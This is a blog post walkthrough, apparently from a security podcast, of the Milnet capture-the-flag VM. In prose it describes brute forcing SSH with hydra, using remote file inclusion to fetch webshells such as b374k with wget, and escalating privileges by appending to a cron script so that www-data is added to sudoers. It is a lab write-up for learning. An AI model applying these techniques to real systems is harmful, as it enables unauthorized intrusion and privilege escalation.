7MS #200: Vulnhub Walkthrough - Milnet
1 min read Podcast, vulnhub, walkthrough

7MS #200: Vulnhub Walkthrough - Milnet

Intro

The following is a semi-spoilerish walkthrough of the Milnet VM from Vulnhub by @teh_warriar.

Disclaimer

I'm intentionally not posting a full walkthrough for a few reasons:

  1. Full (and better) walkthroughs already exist online.

  2. By not posting the full details, it allows readers the chance to get just a little push in the right direction without ruining the entire challenge.

  3. I like to show my full thought process as I do a whole lot of stuff wrong before I start making good progress. We can both likely learn something from that :-)

Write-up

An NMAP scan will reveal ports 80 and 22 open. If you're like me, you get a kick out of using hydra or another similar tool to brute force root@the.target.ip.address just for fun ;-)

While that's going, whenever I see port 80 open I usually visit it in a browser, crawl it with Burp, run nikto on it, and dirb it. In the case of Milnet, this combination of tools should lead you to at least one weakness you can leverage for a shell.

I went with the LFI/RFI route, and this is one of my favorite types of vulns. I usually spin up SimpleHTTPServer and then tamper with requests in Burp to get the target host to "call" to my system. Once I know I'm able to do that, I use something in the /usr/share/webshells dir to get me an initial shell. From that initial shell, I use wget to pull down a better, more functional shell such as b374k.

Then, from my client machine I visited the b374k shell and did further enumeration - this usually includes some privesc-checking scripts, seeing if I can view /etc/passwd, and looking at any cron jobs setup. Oh, and don't forget to explore /home as this folder structure contains a handful of .txt files which will help point you on a privesc path.

From this point, I found a script that is called by cron which I can't edit directly but can append data to. This is where you can have some fun in how you privesc or grab the flag from this point. I went the route of making the script add the www-data user to the /etc/sudoers file. Then I was able to explore the file structure freely and cat-ture the flag!